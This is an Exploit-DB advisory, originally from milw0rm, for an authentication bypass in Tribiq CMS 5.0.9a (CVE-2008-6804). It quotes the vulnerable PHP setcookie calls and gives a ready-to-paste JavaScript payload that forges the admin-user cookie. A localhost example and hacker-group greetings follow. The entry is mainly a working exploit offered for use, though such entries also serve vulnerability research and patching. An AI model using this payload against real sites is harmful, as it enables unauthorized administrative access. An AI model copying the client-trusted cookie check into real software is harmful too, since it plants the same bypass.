Tribiq CMS 5.0.9a (Beta) - Insecure Cookie Handling

EDB-ID:

6886

CVE:

2008-6804

EDB Verified:

Author:

ZoRLu

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-10-31

Vulnerable App:

biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
[~]
[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 30.10.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------

code:

        setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
        setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');


Exploit:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

example for my localhost:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------


# milw0rm.com [2008-10-31]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services